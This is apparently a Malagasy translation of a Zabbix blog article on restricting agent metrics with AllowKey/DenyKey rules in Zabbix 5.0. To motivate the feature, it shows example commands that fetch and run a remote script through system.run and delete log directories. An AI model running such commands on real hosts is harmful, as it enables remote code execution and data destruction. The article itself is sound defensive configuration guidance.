ProHoster > Blog > fitantanan-draharaha > Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa

Tikhon Uskov, Injeniera Integration, Zabbix

Olana fiarovana data

Zabbix 5.0 dia manana endri-javatra vaovao izay ahafahanao manatsara ny fiarovana amin'ny rafitra mampiasa Zabbix Agent ary manolo ny mari-pamantarana taloha EnableRemoteCommands.

Ny fanatsarana ny fiarovana ny rafitra mifototra amin'ny masoivoho dia avy amin'ny hoe afaka manao hetsika marobe mety hampidi-doza ny mpiasa iray.

  • Ny mpandraharaha dia afaka manangona saika ny fampahalalana rehetra, ao anatin'izany ny fampahalalana tsiambaratelo na mety hampidi-doza, avy amin'ny rakitra fikirakirana, rakitra log, rakitra tenimiafina, na rakitra hafa.

Ohatra, amin'ny fampiasana ny zabbix_get utility azonao atao ny miditra amin'ny lisitry ny mpampiasa, ny lahatahiry an-tranony, ny rakitra tenimiafina, sns.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Ny fidirana amin'ny angona amin'ny fampiasana ny zabbix_get utility

FANAMARIHANA. Ny angon-drakitra dia tsy azo alaina raha tsy efa namaky ny fahazoan-dàlana tamin'ny rakitra mifanaraka amin'izany ilay mpandraharaha. Fa, ohatra, ny rakitra /etc/passwd/ azon'ny mpampiasa rehetra vakiana.

  • Ny mpiasa dia afaka manatanteraka baiko mety hampidi-doza ihany koa. Ohatra, key *system.run[]** dia ahafahanao manatanteraka baiko lavitra rehetra amin'ny node-tambajotra, ao anatin'izany ny script fampandehanana avy amin'ny seha-tranonkala Zabbix izay manatanteraka baiko ihany koa eo amin'ny sisin'ny mpiasa. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • Amin'ny Linux, ny mpandraharaha dia mandeha amin'ny alàlan'ny default tsy misy tombontsoa amin'ny faka, fa amin'ny Windows kosa dia mandeha ho serivisy toy ny System izy ary manana fidirana tsy misy fetra amin'ny rafi-drakitra. Noho izany, raha tsy misy fanovana atao amin'ny masontsivana Zabbix Agent aorian'ny fametrahana, dia afaka miditra amin'ny rejisitra, ny rafitra rakitra ary afaka manatanteraka ny fangatahana WMI ny mpiasa.

Ao amin'ny dikan-teny teo aloha ny parameter EnableRemoteCommands=0 navela hanaisotra ny metrika ihany miaraka amin'ny fanalahidy *system.run[]** ary mandeha script avy amin'ny interface Internet, saingy tsy nisy fomba hamerana ny fidirana amin'ny rakitra tsirairay, mamela na manafoana ny lakile tsirairay napetraka miaraka amin'ny mpandraharaha, na mametra ny fampiasana ny mari-pamantarana tsirairay.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Mampiasa ny mari-pamantarana EnableRemoteCommand amin'ny dikan-teny Zabbix teo aloha

AllowKey/DenyKey

Zabbix 5.0 dia manampy amin'ny fiarovana amin'ny fidirana tsy nahazoana alalana amin'ny alàlan'ny fanomezana lisitra fotsy sy lisitra mainty amin'ny famelana sy fandavana ny metrika eo amin'ny lafiny mpandraharaha.

Ao amin'ny Zabbix 5.0 ny fanalahidy rehetra, anisan'izany ny *system.run[]** dia navela, ary niampy safidy roa ny fanamafisam-peo vaovao:

AllowKey= - fisavana nahazo alalana;

DenyKey= - fisavana voarara;

aiza ny lamina anarana manan-danja misy masontsivana mampiasa metacharacters (*).

Ny fanalahidy AllowKey sy DenyKey dia ahafahanao mamela na mandà ny metrika tsirairay mifototra amin'ny lamina manokana. Tsy toy ny mari-pamantarana fanamafisam-peo hafa, tsy voafetra ny isan'ny masontsivana AllowKey/DenyKey. Izany dia ahafahanao mamaritra mazava tsara hoe inona marina no azon'ny mpiasa atao ao amin'ny rafitra amin'ny famoronana hazo fisavana - fanalahidy azo tanterahana, izay manana anjara toerana lehibe ny filaharan'ny fanoratana azy.

Filaharan'ny fitsipika

Ny fitsipika dia voamarina amin'ny filaharan'ny fampidirana azy ao amin'ny fichier configuration. Ny lakile dia voamarina araka ny fitsipika alohan'ny lalao voalohany, ary raha vantany vao mifanaraka amin'ny lamina ny fanalahidin'ny singa data dia avela na lavina izany. Aorian'izany dia mijanona ny fanaraha-maso fitsipika ary tsy raharahaina ny fanalahidy sisa.

Noho izany, raha misy singa mifanandrify amin'ny fitsipika mamela sy mandà, ny valiny dia miankina amin'ny fitsipika izay voalohany ao amin'ny rakitra fanamafisana.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Fitsipika 2 samy hafa mitovy lamina sy fanalahidy iray vfs.file.size[/tmp/file]

Ny filaharan'ny fampiasana ny fanalahidy AllowKey/DenyKey:

  1. fitsipika marina,
  2. fitsipika ankapobeny,
  3. fitsipika mandrara.

Ohatra, raha mila fidirana amin'ny rakitra ao anaty lahatahiry iray ianao, dia tsy maintsy avelanao hiditra amin'izy ireo aloha, ary mandà ny zavatra hafa rehetra izay tsy tafiditra ao anatin'ny fahazoan-dàlana napetraka. Raha ny fitsipika fandavana no ampiasaina aloha dia ho lavina ny fidirana amin'ny lahatahiry.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Filaharana marina

Raha toa ianao ka mila mamela fitaovana 2 handeha amin'ny alalan'ny *system.run[]**, ary ny fitsipika mandà dia hofaritana voalohany, tsy hatomboka ny fitaovana, satria ny lamina voalohany dia hifanaraka foana amin'ny fanalahidy rehetra, ary tsy horaharahaina ny fitsipika manaraka.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Filaharana diso

lamina

Fitsipika fototra

Ny lamina dia fomba fitenenana miaraka amin'ny sari-tany. Ny metacharacter (*) dia mifanandrify amin'ny isan'ny tarehintsoratra amin'ny toerana iray manokana. Ny metacharacters dia azo ampiasaina amin'ny anarana fanalahidy sy amin'ny paramètre. Ohatra, azonao atao ny mamaritra mazava tsara ny mari-pamantarana voalohany amin'ny lahatsoratra, ary mariho ny manaraka ho toy ny wildcard.

Tsy maintsy ampidirina ao anaty fononteny efamira [].

  • system.run[* - diso
  • vfs.file*.txt] - diso
  • vfs.file.*[*] - marina

Ohatra amin'ny fampiasana wildcard.

  1. Ao amin'ny anarana fanalahidy sy amin'ny paramètre. Amin'ity tranga ity, ny lakile dia tsy mifanitsy amin'ny lakile mitovitovy izay tsy misy paramètre, satria ao amin'ny lamina dia nilaza izahay fa te-hahazo fiafaran'ny anaran'ny lakile sy marika maromaro izahay.
  2. Raha tsy mampiasa bracket efajoro ilay lamina, dia avelan'ny lamina ny fanalahidy rehetra tsy misy masontsivana ary mandà ny fanalahidy rehetra misy ny mari-pamantarana voafaritra.
  3. Raha soratana feno ny lakile ary voatondro ho wildcard ny mari-pamantarana, dia hifanaraka amin'ny lakile mitovitovy amin'ny mari-pamantarana rehetra izany ary tsy hifanaraka amin'ny fanalahidy tsy misy bracket efajoro, izany hoe avela na lavina.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Fitsipika momba ny famenoana masontsivana.

  • Raha toa ka natao hampiasaina ny lakile misy masontsivana, dia tsy maintsy apetraka ao amin'ny fichier configuration ny mari-pamantarana. Tsy maintsy faritana ho metacharacter ny paramètre. Ilaina ny mandà amim-pitandremana ny fidirana amin'ny rakitra rehetra ary mandinika izay fampahalalana azon'ny metrika omena amin'ny tsipelina samihafa - misy sy tsy misy mari-pamantarana.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Endri-javatra amin'ny fanoratana fanalahidy misy masontsivana

  • Raha misy lakile voatondro miaraka amin'ny masontsivana, fa ny masontsivana dia azo atao ary voatondro ho metacharacter, fanalahidy tsy misy masontsivana dia ho voavaha. Ohatra, raha tianao ny hanaisotra ny fandraisana vaovao momba ny enta-mavesatra eo amin'ny CPU ary mamaritra fa ny system.cpu.load[*] famaha dia tokony ho kilemaina, aza adino fa ny fanalahidy tsy misy masontsivana dia hamerina ny salan'isa entana antonony.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Fitsipika momba ny famenoana masontsivana

fanamarihana

fanitsiana

  • Ny fitsipika sasany dia tsy azon'ny mpampiasa ovain'ny mpampiasa, ohatra, fitsipika momba ny fikarohana na fitsipika fisoratana anarana ho an'ny mpiasa. Ny fitsipika AllowKey/DenyKey dia tsy misy fiantraikany amin'ireto mari-pamantarana manaraka ireto:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

FANAMARIHANA. Raha misy mpandrindra manakana fanalahidy iray, rehefa anontaniana, dia tsy manome fampahalalana momba ny antony latsaka ao amin'ny sokajy ' ny metrika na fanalahidy iray i Zabbix.TSY ZAKA'. Ny fampahalalana momba ny fandrarana amin'ny fanatanterahana baiko lavitra dia tsy aseho ao amin'ny fisie log'ny mpiasa. Izany dia noho ny antony fiarovana, fa mety hanasarotra ny debugging raha toa ka tafiditra ao anatin'ny sokajy tsy tohana ny metrika noho ny antony.

  • Tsy tokony hiantehitra amin'ny filaharana manokana ianao amin'ny fampifandraisana ireo rakitra fanamafisam-peo ivelany (ohatra, amin'ny filaharan'ny alfabeta).

Utiliti Command Line

Aorian'ny fametrahana ny fitsipika dia mila mahazo antoka ianao fa voarindra tsara ny zava-drehetra.

Azonao atao ny mampiasa ny iray amin'ireo safidy telo:

  • Manampia metrika amin'ny Zabbix.
  • Andrana amin'ny zabbix_agentd. Zabbix agent misy safidy -print (-p) mampiseho ny fanalahidy rehetra (izay avela amin'ny alàlan'ny default) afa-tsy ireo izay tsy avelan'ny fanamafisana. Ary miaraka amin'ny safidy -fitsapana (-t) fa hiverina ny fanalahidy voarara'Fanalahidin'ny singa tsy tohana'.
  • Andrana amin'ny zabbix_get. Utility zabbix_get miaraka amin'ny safidy -k hiverina 'ZBX_NOTSUPPORTED: Metrika tsy fantatra'.

Avelao na mandà

Azonao atao ny mandà ny fidirana amin'ny rakitra iray ary manamarina, ohatra, amin'ny fampiasana ny utility zabbix_getfa nolavina ny fidirana amin'ny rakitra.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

**

FANAMARIHANA. Tsy raharahaina ny teny nalaina tao amin'ny paramètre.

Amin'ity tranga ity, ny fidirana amin'ny rakitra toy izany dia azo avela amin'ny alàlan'ny lalana hafa. Ohatra, raha misy symlink mankany aminy.

Fanohanana lisitra mainty sy fotsy ho an'ny metrikan'ny mpiasa ao amin'ny Zabbix 5.0

Amporisihina ny hanamarina ireo safidy isan-karazany amin'ny fampiharana ireo fitsipika voafaritra, ary diniho koa ny mety hisian'ny fandrarana.

Fanontaniana sy valiny

Ny fanontanianao. Nahoana no lamina be pitsiny toy izany miaraka amin'ny fiteniny manokana no nofidina hamaritana ny fitsipika, ny fahazoan-dàlana ary ny fandrarana? Nahoana no tsy azo ampiasaina, ohatra, ny fomba fiteny mahazatra ampiasain’i Zabbix?

valiny. Olana amin'ny fampandehanana regex ity satria matetika tsy misy afa-tsy mpiasa iray ary manamarina metrika marobe. Regex dia miasa mafy ary tsy afaka manamarina metrika an'arivony amin'ity fomba ity. Wildcards - vahaolana manerantany, be mpampiasa ary tsotra.

Ny fanontanianao. Tsy tafiditra amin'ny filaharan'ny alfabeta ve ny rakitra Include?

valiny. Raha ny fahalalako azy dia saika tsy azo atao ny maminavina ny filaharana hampiharana ny fitsipika raha manaparitaka ireo fitsipika amin'ny rakitra samihafa ianao. Manoro hevitra aho hanangona ny fitsipika AllowKey/DenyKey rehetra ao anaty rakitra iray Ampidiro, satria mifandray izy ireo, ary tafiditra ao anatin'izany ity rakitra ity..

Ny fanontanianao. Ao amin'ny Zabbix 5.0 ny safidy 'EnableRemoteCommands=' tsy hita ao amin'ny fisie fanamafisana, ary AllowKey/DenyKey ihany no misy?

Valio. eny marina izany.

Fidio ny Fiteninao

Source: www.habr.com

Add a comment